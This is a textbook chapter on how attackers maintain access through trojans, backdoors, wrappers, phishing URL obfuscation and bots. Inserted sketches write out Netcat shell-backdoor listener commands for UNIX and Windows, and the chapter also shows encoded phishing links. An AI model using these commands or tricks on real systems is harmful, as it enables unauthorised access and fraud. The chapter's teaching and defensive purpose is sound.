10 Phase 4: Maintaining Access

Trojans, Backdoors, and Rootkits ... Oh My!

After completing Phase 3, the attacker has gained access to the target systems. So, the camel’s nose is under the tent. Now what? After gaining their much-coveted access, attackers want to maintain that access. This chapter discusses the tools and techniques they use to keep access to and control of compromised systems. To achieve these goals, attackers utilize techniques based on malicious software such as Trojan horses, backdoors, bots, and rootkits. To understand how attacks occur, and especially how to defend our networks, a sound understanding of these tools is essential.

Trojan Horses

You remember your ancient Greek history, right? The Greeks were attacking the city of Troy, which was well protected against external attacks. After numerous unsuccessful battles, the Greeks hatched an ingenious scheme to take the city. They built an immense wooden horse, which they left at the gates of Troy. The unsuspecting Trojans thought the horse was a gift from the retreating army (why anyone would think a retreating army would leave a gift is beyond me!). They brought the horse inside the gates, and, as the Trojans slept that night, the Greek warriors crept out of the horse and took the city.

Fast-forward a few millennia. Trojan horse software programs are among the most widely used classes of computer attack tools. Like their counterparts in ancient Greece, Trojan horse software consists of programs that appear to have a benign and possibly even useful purpose, but hide a malicious capability. An attacker can trick a user or administrator into running a Trojan horse program by making it appear attractive and disguising its true nature. Alternatively, bad guys can install a Trojan horse on a victim machine themselves, disguising the malicious code as some useful or expected program so that unsuspecting users and administrators cannot detect the attackers’ presence. Essentially, at some level, a Trojan horse is an exercise in social engineering: Can the attacker dupe the user into believing that the program is beneficial or con the user into running it? The moral of the story: Beware of geeks bearing gifts!

Some Trojan horse programs are merely destructive; they are designed to crash systems or destroy data. One such example of a purely destructive Trojan horse program was a DVD writer software package available for download on the Internet. This amazing gem had great functionality claims. It would convert a standard read-only DVD drive (used to install software or play movies) into a drive that could write DVDs—all through just installing this free software upgrade! According to the README file distributed with this apparently fantastic tool, you could create your own movie DVDs or back up your system with just a free software upgrade. There were only two catches to this astounding deal. First, it is simply physically impossible to do this in software when the underlying hardware is incapable of this function. Second, and tragically, the tool was a Trojan horse that deleted all contents of the poor users’ hard drives. Unfortunately, some unwitting users downloaded the tool and lost all of their data.

Whereas some Trojan horse tools are merely destructive, other Trojan horse programs are even more powerful, allowing an attacker to steal data or even remotely control systems. But let’s not get ahead of ourselves; to understand these capabilities, it’s important to explore the nature of another category of attack tools: backdoors.

Backdoors

As their name implies, backdoor software allows an attacker to access a machine using an alternative entry method. Normal users log in through front doors, such as login screens with user IDs and passwords, token-based authentication (using a physical token such as a smart card), or cryptographic authentication (such as the logon process for Windows or SSH). Attackers use backdoors to bypass these normal system security controls that act as the front door and its associated locks. Once attackers install a backdoor on a machine, they can access the system without using the passwords, encryption, and account structure associated with normal users of the machine.

The system administrator might add new-fangled, ultra-strong security controls for access to a machine, requiring super encryption and multiple passwords for any user on the box. However, with a backdoor in place, an attacker can access the system on the attacker’s terms, not the system administrator’s terms. The attacker might set up a backdoor requiring only a single backdoor password for access, or no password at all. The classic movie War Games illustrates the backdoor concept quite well. In that movie, the attacker types in the password Joshua. For the main computer in War Games, typing that password activated a backdoor that allowed the attacker, as well as the original system designer, to have complete access to the entire system.

Netcat as a Backdoor on UNIX Systems

As we discussed in Chapter 8, Phase 3: Gaining Access Using Network Attacks, a simple yet powerful example of a backdoor can be created using Netcat to listen on a specific port. You remember our good friend Netcat, the tool that is designed to simply and transparently move data around the network from any port on any machine to any other port on any other machine. Suppose an attacker has gained access to a system (perhaps using one of the techniques discussed in Chapter 7, Phase 3: Gaining Access Using Application and Operating System Attacks, or Chapter 8, such as buffer overflows or session hijacking), has broken into a user account with a login name of fred, and wants to set up a command-shell backdoor.

To use Netcat as a backdoor, the attacker must compile it with its GAPING_SECURITY_HOLE option, so that Netcat can be used to start running another program on the victim machine, attaching standard input and output of that program to the network. This option can be easily configured into Netcat while the attacker is compiling it. With a version of Netcat that includes the GAPING_SECURITY_HOLE option, the attacker can run the program with the -e flag to force Netcat to execute any other program, such as a command shell, to handle traffic received from the network. After loading the Netcat executable onto the victim machine, an attacker who has broken into the fred account on a system can type this:

Image

This command will run Netcat as a backdoor listening on local TCP port 12345. Remember, nc is the program name for Netcat. However, an attacker can call the Netcat program any other name desired. When the attacker (or anyone else, for that matter) connects to TCP port 12345 using Netcat as a client, the Netcat backdoor will execute a command shell. As we saw in Chapter 8, a Netcat client runs on the attacker’s machine to connect to a backdoor implemented as a Netcat listener on the victim machine. The attacker then has an interactive shell session across the network to execute any commands of the attacker’s choosing on the victim machine. The context of the command shell session (i.e., the account name, privileges, and the current working directory) will be the same as the attacker who executed the Netcat listener in the first place. In our example, the command was executed from an account belonging to the user fred, so the attacker using the backdoor will have fred’s privileges. Table 10.1 provides commands and explanations to show what an attacker sees on the screen when interacting with this backdoor listener. (The attacker’s keystrokes are in bold.)
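Based on the description above, the listener invocation likely looks something like the following sketch. Exact flag syntax varies across Netcat builds, and the -e option only works in versions compiled with GAPING_SECURITY_HOLE:

```shell
# Start a backdoor shell listener on local TCP port 12345 (Linux/UNIX).
# Requires a Netcat build compiled with the GAPING_SECURITY_HOLE option.
nc -l -p 12345 -e /bin/sh
```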

Table 10.1 Attacker’s Netcat Commands and Responses for a Backdoor Listener with Explanations

Image

There are several items of interest to note in this interactive session. First, notice that no user ID and password are required when going through this particular backdoor. The attacker simply connects to port 12345 and starts typing commands, which our Netcat listener dutifully feeds into the command line for execution. Of course, an attacker could have used a specialized login routine, requiring a password to access the backdoor. Sometimes, attackers write a simple authentication script around Netcat to check a user ID and password before running the command shell. Also, note that there is no command prompt displayed for these commands. The Netcat listener running /bin/sh on Linux or UNIX does not return a command prompt, requiring the attacker to type commands without the prompt character. When using the Windows version of Netcat, the familiar C:\> command prompt is displayed. Finally, notice how the commands are executed in the context of the user that started the backdoor listener. The ls command showed the contents of the working directory of the attacker when the Netcat listener was started. The whoami command showed the effective user ID to be fred, the account used by the attacker when the backdoor listener was run.
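To make this concrete, here is a sketch of what the attacker’s side of the session might look like, assuming a hypothetical victim host name and a listener already running on port 12345:

```shell
# On the attacker's machine: connect to the backdoor listener.
# (The victim host name here is hypothetical.)
nc victim.example.com 12345
# No prompt appears; typed commands go straight to /bin/sh on the victim:
#   ls       -> lists the working directory where the listener was started
#   whoami   -> prints fred, the account that launched the listener
```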

An attacker can also create a very similar backdoor on a Windows system using the Windows version of Netcat with the Windows command shell, cmd.exe. The command to execute to create such a listener is:

Image
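The Windows listener described above would likely be invoked as follows, again as a sketch; as on UNIX, the -e option requires a Netcat build with GAPING_SECURITY_HOLE enabled:

```shell
REM Start a backdoor command-shell listener on TCP port 12345 (Windows).
nc -l -p 12345 -e cmd.exe
```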

You might wonder, “Yes, but why? If the attacker has access to the system with account fred, why set up a backdoor listener for access? Why implement a backdoor when you’ve already got access through the front door?” Good question. Attackers often establish a backdoor as a hedge against the possibility that their normal front-door access might be shut down. A backdoor, ideally, will continue to provide access for the attacker even as the system configuration changes, with users being added and deleted and services being turned off and on. What if normal SSH access goes away because a new system administrator decides to disable SSH and uses a fancy Web-based administrator console for the box? The attacker can still use a backdoor to gain access even if the original entry point is closed by a more diligent system administrator. Once attackers gain access, they want to keep it. Backdoors provide just what the attackers need: reliable, consistent access on their own terms.

The Devious Duo: Backdoors Melded into Trojan Horses

We’ve seen pure Trojan horses (the evil DVD writer example) and pure backdoors (the example with the Netcat listener executing a shell). Things get far more interesting when the two classes of tools are melded together into Trojan horse backdoors. These programs appear to have a useful function, but in reality, allow an attacker to access a system and bypass security controls—a deadly combination of Trojan horse and backdoor characteristics. Although not every Trojan horse is a backdoor, and not every backdoor is a Trojan horse, those tools that fall into both categories are particularly powerful weapons in the attacker’s arsenal.

Roadmap for the Rest of the Chapter

Throughout the rest of this chapter, we discuss several tools that fall into the Trojan horse backdoor genre, all operating at different layers of our systems: application-level Trojan horse backdoors, user-mode rootkits (which modify or replace critical operating system executable programs or libraries), and kernel-mode rootkits (which modify the kernel of the operating system). Section by section through the rest of the chapter, we dissect each of these layers one by one, examining the capabilities of malicious code at each layer and offering defenses for each. As we progress through these layers, the attacker’s ability to hide increases significantly. Table 10.2 highlights each of these classes of Trojan horse backdoors. In the table, an analogy is included to illustrate how the particular tool works. For the analogy, consider a scenario where you are trying to eat soup and an attacker is trying to poison you.

Table 10.2 Categories of Trojan Horse Backdoors

Image

As you can see, all of the tools in this class are quite powerful in the hands of attackers, with each category providing a deeper level of infiltration and control of a system. Given their power and widespread use, it is critical to understand how these tools are used and how to defend against them. As we look at each level of malicious code in more detail, we’ll return to that “Analogy” column from Table 10.2 to get a feel for how each specimen of Trojan horse backdoor impacts your system, as though you were eating a bowl of poisoned soup. We analyze each category of Trojan horse backdoor, starting our detailed analysis by looking at the very popular application-level Trojan horse backdoors.

Nasty: Application-Level Trojan Horse Backdoor Tools

As described in Table 10.2, application-level Trojan horse backdoors are tools that add a separate application to a system to give the attacker a presence on the victim machine. This software could provide the attacker with backdoor command-shell access to the machine, give the attacker the ability to control the system remotely, or even harvest sensitive information from the victim. The application-level Trojan horse backdoor analogy of Table 10.2 involves an attacker adding poison to your bowl of soup. A foreign entity has been introduced into your meal, allowing an attacker access to your tummy.

An enormous number of application-level Trojan horse backdoors have been developed for Windows platforms of all types. Because of the use of Windows on millions of computers worldwide, attackers want to exercise control over these machines. Although the techniques discussed in this section could also be applied to Linux or UNIX machines (or any type of general-purpose operating system for that matter), they are most widely used on Windows systems, due to the prevalence of Windows on the desktop. Application-level Trojan horse backdoors come in a variety of flavors, each with a separate focus in allowing the bad guy to achieve some goal. Let’s zoom in on three different types of application-level Trojan horse backdoors that support different attacker goals: remote-control backdoors, bots, and spyware.

Remote-Control Backdoors

What can the poison in your belly allow the attacker to do on your machine? First, application-level Trojan horse backdoors can give an attacker the ability to control a system across the network. If an attacker can get one of these beasts installed on your laptop, desktop, or server, the attacker will “0wn” your machine, having complete control over the system’s configuration and use. With a remote-control backdoor, the attacker can read, modify, or destroy all information on the system, from financial records to other sensitive documents, or whatever else is stored on the machine. Critical system applications can be stopped, impacting Internet services or Windows-controlled machinery and equipment.

Demonstrating the power of remote-control backdoors in the hands of skilled attackers, Microsoft itself appears to have been attacked with this type of tool in October 2000. Based on reports in the media, it appears that a Microsoft employee working from home was the victim of an application-level Trojan horse backdoor called QAZ. Once installed on the telecommuter’s computer, the Trojan horse spread itself around Microsoft’s corporate network, gathering passwords and allowing the attackers to snoop around, even viewing source code from Microsoft products.

Figure 10.1 shows the simple architecture of these tools. The attacker installs or tricks the user into installing the remote-control backdoor server on the target machine. Once installed, the backdoor server waits for connections from the attacker, or polls the attacker asking for commands to execute. The attacker uses a specialized remote-control client tool to generate the command for the remote-control backdoor server. When it receives a command, the remote-control backdoor executes the commands and sends a response back to the client. The attacker installs the client on a separate machine, and uses it to control the server across a network, such as an organization’s intranet or the Internet itself.

Figure 10.1 An attacker uses a remote-control backdoor to access and control a victim across the network.

Image

Software developers in the computer underground have released thousands of tools with the exact same architecture shown in Figure 10.1. Sadly, it almost seems like a rite of passage for some in the computer underground to create a remote-control backdoor and release it publicly. To demonstrate their coding skills, numerous attackers craft a remote-control tool for Windows, release it to the world, and then move on to bigger and better attacks, including the rootkit tools we discuss later in this chapter. When these remote-control backdoor tools are initially released, the antivirus vendors scramble to devise new signatures to detect each one. For a short time after release, however, signatures don’t yet exist, making the bad guy’s job easier.

The Megasecurity Web site at www.megasecurity.org lists thousands of remote-control backdoor tools. This very comprehensive site is maintained by Aphex, Da_Doc, Magus, and MasterRat. This team provides a comprehensive inventory, listing each tool’s name, author, country of origin, and a screenshot showing the user interface. They also include a list of TCP and UDP port numbers used by each remote-control backdoor, the registry keys it modifies or adds, and a brief summary of the tool’s functionality. Although Megasecurity offered the code of each tool for download in the past, they currently do not distribute the software itself anymore. Now, the site is focused on providing a comprehensive inventory of these tools, with a list sorted by month of release from March 2000 through today. Some months have a relatively small number of tools released (a dozen), but many months have more than 50 of these darn things! Figure 10.2 shows a small sample of the user interfaces of some of the items inventoried at Megasecurity.

Figure 10.2 A small sampling of remote-control backdoors at Megasecurity. Note the different languages and styles, yet all use the same remote-control client–server architecture.

Image

Whenever I’m investigating an attack associated with a remote-control backdoor, I typically search the Megasecurity site based on the Registry keys, port numbers, or file artifacts I’ve found associated with the attacker’s tool. Although the Megasecurity site offers its own built-in search capability, I prefer using Google’s handy “site:” directive that we discussed in Chapter 5, Phase 1: Reconnaissance, to scour through Megasecurity’s records. I frequently perform Google searches for site:megasecurity.org followed by the port number, Registry key name, and file name that I’ve discovered in the wild during an investigation. Note that this technique of looking for file names and related artifacts via search engines is just the starting point of an investigation. I also often move the evil specimen to an isolated laboratory system without any sensitive data loaded on it. There, I run the evil program to observe its capabilities before completely restoring the deliberately infected system to its original state.

Another huge list of remote-control backdoor tools (running on a variety of Windows and non-Windows platforms) is maintained by Joakim von Braun (of von Braun Consultants) at www.simovits.com/nyheter9902.html. The von Braun list shows the names and default ports used by each Trojan horse backdoor tool. Although hundreds of varieties of these backdoor Windows tools exist, the script kiddie masses focus on a small number of these tools. Based on my observations of these tools in the wild, the most popular Windows remote-control tools are the following (in decreasing order of popularity):

  • The Virtual Network Computing (VNC) tool, a free, cross-platform (UNIX and Windows) tool used for legitimate remote administration but often abused as a backdoor, freely available at www.realvnc.com.
  • Dameware, a legitimate commercial remote-control tool available for a fee, but also with a free demo version, at www.dameware.com. Like VNC, this normally legitimate tool is sometimes abused by attackers as a backdoor.
  • Back Orifice 2000, at www.bo2k.com, one of the first and most powerful tools in this category.
  • SubSeven, a very popular remote-control backdoor suite, with several competing versions available on the Internet.

What Can a Remote-Control Backdoor Do?

Although the functionality of various remote-control backdoors varies, most of them draw from a basic set of similar underlying functions. One particular tool might offer better control of the GUI (such as VNC), whereas others might include more control over local resources, including the hard drive, memory, and file system (such as BO2K). Still others excel at acting as a relay in moving traffic across the network to obscure the location of the attacker (such as SubSeven). Although particular tool functionality varies, Table 10.3 provides a round-up of various capabilities included in a majority of the tools listed at the Megasecurity Web site.

Table 10.3 A Sampling of Remote-Control Backdoor Functionality

Image

Image

Image

Image

As an example of these capabilities implemented in one venerable remote-control backdoor, consider Figure 10.3, which shows an image of the BO2K screen. The attacker has configured BO2K to watch the GUI of the victim, dump the encrypted password representations from the target machine, and activate a keystroke logger. The attacker is now about to take over mouse control of the victim system.

Figure 10.3 BO2K in use.

Image

What Is So Evil About That?

With these capabilities, most remote-control backdoors look remarkably like legitimate remote-control programs designed for system administrators and remote users, such as the commercial tools Symantec’s pcAnywhere, Altiris Carbon Copy, VNC, Dameware, Laplink, or even Microsoft’s own built-in Windows Remote Desktop utility. Indeed, many remote-control backdoor tools do the same thing as these useful remote-control programs, and in some cases, have added capabilities, together with source code. In fact, as we discussed earlier, attackers abuse some of the legitimate commercial tools such as VNC and Dameware, using them for illicit remote control.

In a sense, remote-control tools, whether created by commercial companies, open source developers, or the computer underground, are like a hammer. You can use a hammer to build a house, or you can hit someone in the head with it. It is the user’s motivation, not anything in the tool itself, that determines whether the tool is used for evil. The tool can be used by the white hats (i.e., legitimate system administrators and security personnel) or the black hats (i.e., the attackers).

Build Your Own Trojans Without Any Programming Skill!

How does an attacker get a remote-control backdoor installed on the victim machine? Most often, the attackers trick the victim user into installing it. But there’s a catch: If I e-mail you a program titled Evil Backdoor or even VNC, you probably won’t run it (although, lamentably, some users will run anything you send them). One of the most popular methods for distributing malicious code today remains mass e-mailing. Every day, millions of spoofed e-mails are sent from infected machines to everyone in the e-mail contact list of the infected machine, containing an attachment that implements an application-level Trojan horse backdoor. Because they use e-mail addresses harvested from one victim’s contact list, these spoofed messages might appear legitimate, seeming to come from an acquaintance. Increasingly, we are seeing highly skilled attackers sending targeted e-mail with Trojan horse backdoor attachments into specific companies and government organizations, designed to infiltrate those targets on behalf of an attacker. With a spoofed source e-mail address making the message appear to come from an important contact in the target, such as a CEO or other high-ranking person, the odds that the e-mail attachment will be executed increase massively.

To further increase the likelihood that a user will install the backdoor, the computer underground has released programs called wrappers or binders. These tools are useful in creating Trojan horses that install a remote-control backdoor. A wrapper attaches a given .EXE application (such as a simple game, an office application, or any other executable program) to the remote-control backdoor server executable (or any other executable, for that matter). The two separate programs are wrapped together in one resulting executable file that the attackers can name anything they want. Two executables enter the wrapper, and one executable leaves with the blended functionality of both input programs.

When the user runs the resulting wrapped executable file, the system first installs the remote-control backdoor, and then runs the benign application. The user only sees the latter action (which will likely be running a simple game or other program), and is duped into installing the remote-control backdoor. By wrapping a remote-control backdoor server around an electronic greeting card, I can send a birthday greeting that will install the backdoor as the user watches a birthday cake dancing across the screen. These wrapping programs are essentially do-it-yourself Trojan horse creation programs, allowing anyone to create a Trojan horse without doing any programming.
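To illustrate the wrapping concept without building real malware, here is a minimal, hypothetical sketch in Python. Real wrappers combine two compiled executables; here both “programs” are just snippets of code, and the file name and payload are harmless stand-ins chosen for illustration:

```python
# A toy illustration of the wrapper concept: two "programs" become one.
benign_program = 'print("Happy Birthday!")'           # what the user expects to see
hidden_program = (                                     # stand-in for a backdoor installer
    'open("wrapper_marker.txt", "w").write("installed")'
)

# The wrapper concatenates the two: the hidden functionality runs first,
# then the benign application, so the user only notices the latter.
wrapped_program = hidden_program + "\n" + benign_program

exec(wrapped_program)  # shows the greeting; silently drops the marker file
```

The point of the sketch is the ordering: the user-visible program masks the side effect that ran before it.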

Numerous wrapper programs have been released, including Silk Rope, Saran-Wrap, EliteWrap, AFX File Lace, and Trojan Man. The AFX File Lace and Trojan Man programs even encrypt the malicious code before the wrapping process occurs, a process illustrated in Figure 10.4. That way, antivirus programs with signatures for the malicious code cannot detect the encrypted, wrapped payload, because the encrypted code no longer matches the signatures. To make this encrypted code functional, these wrappers embed additional software in the resulting output program that decrypts the malicious code when the combined package is executed on the victim machine. Of course, the antivirus vendors have created signatures to detect the decryption software employed by AFX File Lace and Trojan Man. Still, in future versions of these types of wrappers, we might see decryptors that dynamically alter their own code to evade antivirus signatures. By recoding itself on the fly, such software would morph as it runs, altering its instructions but not its functionality by choosing from functionally equivalent machine-language sequences. Software implementing this technique is known as polymorphic code: pieces of code with the exact same functionality but a different set of instructions, so an antivirus signature that detects one version will not detect another, functionally equivalent, version. Using a sophisticated wrapper with polymorphic capabilities, an attacker could create morphed decryptors that evade detection.
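The polymorphism idea can be sketched in a few lines of Python: two routines with identical behavior but different underlying byte patterns, so a naive “signature” computed over one does not match the other. This is only an analogy; real polymorphic engines mutate machine code, not Python bytecode:

```python
import hashlib

def decode_v1(data, key):
    # XOR-decode using a generator expression.
    return bytes(b ^ key for b in data)

def decode_v2(data, key):
    # Functionally equivalent XOR decode, written as an explicit loop,
    # so the compiled bytecode differs from decode_v1.
    out = []
    for b in data:
        out.append(b ^ key)
    return bytes(out)

payload = bytes([0x6B, 0x66, 0x6F, 0x6F, 0x6C])  # "hello" XOR-ed with 0x03

# A naive "signature": a hash over each routine's bytecode.
sig_v1 = hashlib.sha256(decode_v1.__code__.co_code).hexdigest()
sig_v2 = hashlib.sha256(decode_v2.__code__.co_code).hexdigest()

print(decode_v1(payload, 0x03))  # both decoders recover the same payload
print(sig_v1 != sig_v2)          # yet their byte-level signatures differ
```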

Figure 10.4 Wrapping two executables into a single package, and using encryption to evade antivirus tools.

Image

But Where Are My Victims?

One of the fundamental problems with these application-level Trojan horse backdoor tools, from an attacker’s perspective, involves knowing where the ultimate victims are. Consider a scenario where an attacker uses a wrapper program to create a holiday greeting card with a remote-control backdoor wrapped up inside. The bad guy sends the resulting package via e-mail to one victim. This victim runs the program and loves the dancing ornaments and jamming holiday tunes. The unsuspecting victim wants to spread this holiday cheer with other people, forwarding the pretty but poisonous e-mail to two friends. These two friends like the holiday greeting as well, and forward it to two friends, and so on, and so on, infesting hundreds or even thousands of computers with the remote-control backdoor. Ultimately, the attacker doesn’t know who all the victims are, and cannot remotely control them without knowing the victim’s IP address. After all, the remote-control client requires the attacker to enter in the IP address of the victim to be controlled. How can an enterprising attacker solve this dilemma?

To solve this problem, some of the remote-control backdoor programs, including BO2K and SubSeven, include notification functionality to alert the bad guys when a new victim falls under their control. Some of these tools advertise the fact that a system with a remote-control backdoor on it has started up by sending an e-mail to the attacker, in effect saying, “Come and get me!” Now, e-mail can take several minutes to propagate across the Internet. Attackers in a hurry might want real-time notification about a new victim, rather than waiting for e-mail to arrive. Impatient attackers sometimes rely on notification via an Internet Relay Chat (IRC) channel to announce a new remote-control backdoor server in real time. Beyond this announcement capability for newly infected systems, we’ll look at additional uses of IRC for application-level Trojan horse backdoors later in this chapter, when we cover bots.

Shipping Remote-Control Backdoors via the Web: ActiveX Controls

Remote-control backdoors get even more powerful when melded with some of the active content mechanisms on the World Wide Web. ActiveX is a Microsoft-developed technology for distributing executable content via the Web. Like Sun’s Java, ActiveX sends code from a Web server to a browser, where it is executed.

These individual applications are referred to as ActiveX controls. Unlike Java applets, which are confined to a sandbox that limits their ability to attack the host machine, an ActiveX control can do anything on users’ machines that the users themselves can do: alter the configuration, delete files, send data anywhere on the network, and so on. You simply surf to my Web site with a browser configured to run ActiveX controls, and my Web server pumps an ActiveX control including a remote-control backdoor server to your browser, which runs the program and installs my evil code without your noticing.

Microsoft has engineered ActiveX controls to run only if they have a proper digital signature, using Microsoft’s Authenticode technology. Unfortunately, users can disable this signature check in their browsers, allowing some very nasty code to run on their systems. Alternatively, an improperly signed or unsigned ActiveX control forces most browsers to prompt a user asking whether the untrusted code should be executed. Most users unwittingly click OK without realizing that they’ve just given control of their machines over to an attacker.

Trojan Horses of a Different Color: Phishing Attacks and URL Obfuscation

As we have seen, attackers frequently distribute backdoor software as e-mail attachments. However, another Trojan horse activity associated with e-mail has no attachment at all, but instead a link to a Web site that appears to belong to a legitimate online enterprise. In these so-called phishing attacks, the bad guys spew thousands or millions of e-mail messages to a target list of addresses harvested from victim machines. These e-mails are spoofed to appear to come from a trusted source such as a bank, e-commerce company, or other financial services organization dealing with sensitive data. Some of these phishing e-mails are quite convincing, exhorting users to click on the link to reset their password, review recent purchase activity, or otherwise log in to their account to handle an urgent situation. But, of course, the link in the e-mail points not to the legitimate Web site, but instead to a cleverly disguised Web site controlled by the attacker. When an unsuspecting user clicks the link and sees what appears to be the e-commerce site, he or she might fill in critical account information, including credit card numbers, Social Security numbers, or banking account numbers. The bogus Web site, operated by the attacker, then dutifully harvests this sensitive information on behalf of the bad guys, who will later use it for fraudulent transactions or full-scale identity theft.

With phishing, instead of distributing a Trojan horse backdoor as an e-mail attachment, the e-mail simply points to a Web site that is itself the Trojan horse. It sure looks like the user’s bank, but it is, in fact, an evil duplicate.

The links included in phishing e-mails actually point to the attacker's site, but trick the user in any one of a variety of ways. The attackers want their links in the e-mail to appear to point to the legitimate site, but to access their own evil site when clicked. Often, the attackers use an <A> tag to display certain text for the link on an HTML-enabled e-mail client screen, with the tag's HREF attribute actually pointing somewhere else.

First, and perhaps most simply, the attacker could dupe the user by creating a link that displays the text www.goodwebsite.org on the screen but really links to an evil site. To achieve this, the attacker could compose a link like the following and embed it in an e-mail message or on a Web site:

<A HREF="http://www.evilwebsite.org">www.goodwebsite.org</A><p>

Most HTML-rendering mail clients merely show a hot-link labeled www.goodwebsite.org. When a user clicks it, however, he or she is directed to www.evilwebsite.org. Browser history files, proxy logs, and filters, however, are not tricked by this mechanism at all, because the full evil URL is still sent in the HTTP request, without any obscurity. This technique is designed to fool human users only. Of course, although this form of obfuscation can be readily detected by viewing the source HTML of the e-mail message, it still tricks many victims and is commonly utilized in phishing schemes.
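To see this trick from the defender's side, here is a minimal sketch (in Python, purely for illustration) that pulls each link's HREF and its displayed text out of a message and flags pairs where the visible text names one host but the link actually targets another. The class and function names are my own invention, not from any real tool:

```python
# Defender's-eye view: collect (href, visible text) pairs from anchor tags
# and flag links whose displayed text names a different host than the target.
from html.parser import HTMLParser
from urllib.parse import urlparse

class LinkAuditor(HTMLParser):
    """Collect (href, visible text) pairs from <a> tags."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def looks_deceptive(href, text):
    """True when the displayed text looks like a hostname but differs from
    the host the link actually targets."""
    if "." not in text:
        return False              # plain words like "click here" aren't URLs
    text_host = urlparse("http://" + text).hostname
    return text_host != urlparse(href).hostname

auditor = LinkAuditor()
auditor.feed('<A HREF="http://www.evilwebsite.org">www.goodwebsite.org</A>')
for href, text in auditor.links:
    print(href, text, looks_deceptive(href, text))
```

A mail gateway applying this sort of check would have flagged the example link above immediately, even though a human reader sees only the friendly text.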

More subtle methods of disguising URLs can be achieved by combining this tactic with a different encoding scheme for the evil Web site URL. The vast majority of browsers and e-mail clients today support encoding URLs in a hex representation of ASCII or in Unicode (a 16-bit character set designed to represent more characters than plain old 7-bit ASCII). Using any ASCII-to-Hex-to-Unicode calculator, such as the handy free online tool at http://www.mikezilla.com/exp0012.html, an attacker could convert www.evilwebsite.org into the following ASCII or Unicode representations and include them in the HREF attribute of an <A> tag:

  • <A HREF="http://%77%77%77%2E%65%76%69%6C%77%65%62%73%69%74%65%2E%6F%72%67">www.goodwebsite.org</A><p>
  • <A HREF="http://&#119;&#119;&#119;&#46;&#101;&#118;&#105;&#108;&#119;&#101;&#98;&#115;&#105;&#116;&#101;&#46;&#111;&#114;&#103;">www.goodwebsite.org</A><p>
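Both obfuscated forms decode to the same hostname. You can verify this with a few lines of Python; the snippet below (an illustration, not taken from any attack tool) regenerates both encodings of www.evilwebsite.org from scratch and checks the round trip:

```python
# Regenerate the two obfuscated encodings of a hostname and confirm that
# standard decoding routines turn both back into the original string.
from urllib.parse import unquote
import html

host = "www.evilwebsite.org"

# Percent-encoded hex form: every character becomes %XX
hex_form = "".join("%{:02X}".format(ord(c)) for c in host)

# Decimal character-reference form: every character becomes &#NNN;
entity_form = "".join("&#{};".format(ord(c)) for c in host)

print(hex_form)        # %77%77%77%2E%65%76%69%6C...
print(entity_form)     # &#119;&#119;&#119;&#46;...

assert unquote(hex_form) == host
assert html.unescape(entity_form) == host
```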

These tactics just scratch the surface of the several dozen mechanisms bad guys use to obscure their URLs. Other tactics include sending JavaScript in the message that stores the e-mail content, including the URLs, in encrypted form, decrypting it only when it is displayed in a mail reader or browser's HTML rendering engine. If a user views the source of the message, only the decrypting script is displayed, along with a bunch of cryptographic gibberish. Other URL-obscuring tactics involve including special characters in the URL that cause browsers problems displaying the full URL, such as the %01 character, which made old versions of Internet Explorer stop displaying all parts of the URL after that character.

These phishing and URL obscuring attacks get even more insidious when combined with the evil SSL manipulation techniques we discussed in Chapter 8. A bad guy could generate an SSL certificate that appears to be from a bank or e-commerce company. When a user clicks the link in a phishing e-mail, an SSL connection is established with the attacker’s own Web server. At this point, the browser might alert the user that the certificate does not appear to be signed by a legitimate Certificate Authority. The security of the situation is then all left in the user’s hands. Will the user allow this unsecured connection and then supply the attacker’s Web site with sensitive information? Sadly, many users will, completely overriding any security that might have been offered by SSL. Phishing, URL obfuscation, and SSL trickery are a truly devious combination that we face on a regular basis today, making it very difficult for users to keep their information secure.

Also Nasty: The Rise of the Bots

The remote-control backdoors we’ve been discussing are designed so that the bad guy can have complete control over a machine, one victim at a time. The attacker can log in to his new prey, control it, log out, and then move on to control a different victim. However, another class of application-level Trojan horse backdoor raises the ante significantly: bots. Bots are simply software programs that perform some action on behalf of a human on large numbers of infected machines. Unlike the one-at-a-time architecture of remote-control backdoors, bots are designed for economies of scale. Using bot software, a single attacker could have dozens, hundreds, thousands, or even more systems under control simultaneously, each with bot software installed to maintain and coordinate that control, as illustrated in Figure 10.5. An attacker installs bots or tricks users into installing them on as many machines as possible, the more the merrier (for the attacker, that is).

Figure 10.5 Bots are designed to be used en masse, increasing the economies of scale of the bad guy’s attack.

Image

Collections of bots under the control of a single attacker are called bot-nets, and the people controlling such systems are sometimes called bot-herders, a name that conjures images of a cowboy sitting at a laptop corralling digital “cattle.” With thousands or hundreds of thousands of bots, a bot-herder can cause significant damage. Indeed, the largest bot-net our team has handled involved 171,000 systems under the control of a single attacker! The attacker could have collectively utilized the resources of all of those victim machines, which included home user systems connected to DSL and cable-modem lines, university machines in computer centers and dorm rooms, corporate computers on vast intranets, and government machines scattered all over the Internet.

Bots originated in the early 1990s as a tool to maintain control of an IRC channel. Some owners and users of various IRC channels noticed that when they logged out of a channel, an attacker would grab control of the channel or take over their chat username with a bot. Once in control of the channel, the attacker would kick his or her enemies out of the channel and allow in only those who curried favor with the intruder. The bot would monitor the channel and grab control when the channel owner or user left. To help minimize this kind of attack, the channel owners themselves turned to bots, making sure they never gave up control of the channel in the first place by employing a bot to periodically send keep-alive traffic to the IRC channel. Of course, an arms race quickly erupted, with the bad guys deploying more and more bots to gang up on the channel owners’ own bots, trying to force them out. Although these little bot skirmishes of yesteryear fighting over IRC turf were certainly entertaining, newer bots have gone mainstream with far more functionality.

Dozens of bot variations are available today, with source code available freely for download and customization. Some of the most popular and prolific are the phatbot family (which includes more than 500 variations based on tweaks of the same original code, with names like phatbot, gaobot, agobot, and forbot), the sdbot family (which includes sdbot, rbot, and others), and the mIRC bot family. Each of these specimens includes very modular code, which is rapidly being updated by the attacker community. Because the code is so modular and available in its original source code format, new mutant strains of bots arise almost every day on the Internet. Whereas some bots are cobbled together out of poorly written code (such as the sdbot family), others are very elegantly written, finely tuned for their malicious purposes (such as the phatbot family). In fact, one bot researcher commented on the high quality of the phatbot code by saying, “The code reads like a charm; it’s like dating the devil.”

